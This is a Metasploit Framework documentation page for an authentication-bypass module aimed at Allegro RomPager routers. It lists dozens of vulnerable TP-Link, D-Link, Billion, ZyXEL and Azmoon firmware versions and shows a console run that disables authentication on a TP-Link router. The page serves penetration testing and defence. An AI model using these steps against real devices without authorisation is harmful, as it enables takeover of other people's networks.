rapid7/metasploit-framework

documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md

## Vulnerable devices

The following devices and firmware versions are known to be vulnerable:

 * Azmoon   AZ-D140W - 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1
 * Billion  BiPAC 5102S - Av2.7.0.23 (UE0.B1C)
 * Billion  BiPAC 5102S - Bv2.7.0.23 (UE0.B1C)
 * Billion  BiPAC 5200 - 2.11.84.0(UE2.C2)3.11.11.6
 * Billion  BiPAC 5200 - 2_11_62_2_ UE0.C2D_3_10_16_0
 * Billion  BiPAC 5200A - 2_10_5 _0(RE0.C2)3_6_0_0
 * Billion  BiPAC 5200A - 2_11_38_0 (RE0.C29)3_10_5_0
 * Billion  BiPAC 5200GR4 - 2.11.91.0(RE2.C29)3.11.11.52
 * Billion  BiPAC 5200SRD - 2.10.5.0 (UE0.C2C) 3.6.0.0
 * Billion  BiPAC 5200SRD - 2.12.17.0_UE2.C3_3.12.17.0
 * Billion  BiPAC 5200SRD - 2_11_62_2(UE0.C3D)3_11_11_22
 * D-Link   DSL-2520U - Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL
 * D-Link   DSL-2600U - Z1_DSL-2600U
 * D-Link   DSL-2600U - Z2_V1.08_ras
 * TP-Link  TD-8616 - V2_080513
 * TP-Link  TD-8816 - V4_100528_Russia
 * TP-Link  TD-8816 - V4_100524
 * TP-Link  TD-8816 - V5_100528_Russia
 * TP-Link  TD-8816 - V5_100524
 * TP-Link  TD-8816 - V5_100903
 * TP-Link  TD-8816 - V6_100907
 * TP-Link  TD-8816 - V7_111103
 * TP-Link  TD-8816 - V7_130204
 * TP-Link  TD-8817 - V5_100524
 * TP-Link  TD-8817 - V5_100702_TR
 * TP-Link  TD-8817 - V5_100903
 * TP-Link  TD-8817 - V6_100907
 * TP-Link  TD-8817 - V6_101221
 * TP-Link  TD-8817 - V7_110826
 * TP-Link  TD-8817 - V7_130217
 * TP-Link  TD-8817 - V7_120509
 * TP-Link  TD-8817 - V8_140311
 * TP-Link  TD-8820 - V3_091223
 * TP-Link  TD-8840T - V1_080520
 * TP-Link  TD-8840T - V2_100525
 * TP-Link  TD-8840T - V2_100702_TR
 * TP-Link  TD-8840T - V2_090609
 * TP-Link  TD-8840T - V3_101208
 * TP-Link  TD-8840T - V3_110221
 * TP-Link  TD-8840T - V3_120531
 * TP-Link  TD-W8101G - V1_090107
 * TP-Link  TD-W8101G - V2_100819
 * TP-Link  TD-W8101G - V2_101015_TR
 * TP-Link  TD-W8101G - V2_101101
 * TP-Link  TD-W8101G - V3_110119
 * TP-Link  TD-W8101G - V3_120213
 * TP-Link  TD-W8101G - V3_120604
 * TP-Link  TD-W8151N - V3_120530
 * TP-Link  TD-W8901G - V1_080522
 * TP-Link  TD-W8901G - V1,2_080522
 * TP-Link  TD-W8901G - V2_090113_Turkish
 * TP-Link  TD-W8901G - V3_140512
 * TP-Link  TD-W8901G - V3_100603
 * TP-Link  TD-W8901G - V3_100702_TR
 * TP-Link  TD-W8901G - V3_100901
 * TP-Link  TD-W8901G - V6_110119
 * TP-Link  TD-W8901G - V6_110915
 * TP-Link  TD-W8901G - V6_120418
 * TP-Link  TD-W8901G - V6_120213
 * TP-Link  TD-W8901GB - V3_100727
 * TP-Link  TD-W8901GB - V3_100820
 * TP-Link  TD-W8901N - V1_111211
 * TP-Link  TD-W8951ND - V1_101124,100723,100728
 * TP-Link  TD-W8951ND - V1_110907
 * TP-Link  TD-W8951ND - V1_111125
 * TP-Link  TD-W8951ND - V3.0_110729_FI
 * TP-Link  TD-W8951ND - V3_110721
 * TP-Link  TD-W8951ND - V3_20110729_FI
 * TP-Link  TD-W8951ND - V4_120511
 * TP-Link  TD-W8951ND - V4_120607
 * TP-Link  TD-W8951ND - V4_120912_FL
 * TP-Link  TD-W8961NB - V1_110107
 * TP-Link  TD-W8961NB - V1_110519
 * TP-Link  TD-W8961NB - V2_120319
 * TP-Link  TD-W8961NB - V2_120823
 * TP-Link  TD-W8961ND - V1_100722,101122
 * TP-Link  TD-W8961ND - V1_101022_TR
 * TP-Link  TD-W8961ND - V1_111125
 * TP-Link  TD-W8961ND - V2_120427
 * TP-Link  TD-W8961ND - V2_120710_UK
 * TP-Link  TD-W8961ND - V2_120723_FI
 * TP-Link  TD-W8961ND - V3_120524,120808
 * TP-Link  TD-W8961ND - V3_120830
 * ZyXEL    P-660R-T3 - 3.40(BOQ.0)C0
 * ZyXEL    P-660RU-T3 - 3.40(BJR.0)C0

## Module usage

This is an example run against a TP-Link TD-8817 router:

```
msf > use auxiliary/admin/http/allegro_rompager_auth_bypass
msf auxiliary(allegro_rompager_auth_bypass) > show options

Module options (auxiliary/admin/http/allegro_rompager_auth_bypass):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.1      yes       The target address
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       URI to test
   VHOST                       no        HTTP server virtual host


msf auxiliary(allegro_rompager_auth_bypass) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf auxiliary(allegro_rompager_auth_bypass) > run

[+] Detected device:TP-Link TD-8817
[-] Bad response
[-] Bad response
[+] Good response, please check host, authentication should be disabled
[*] Auxiliary module execution completed
```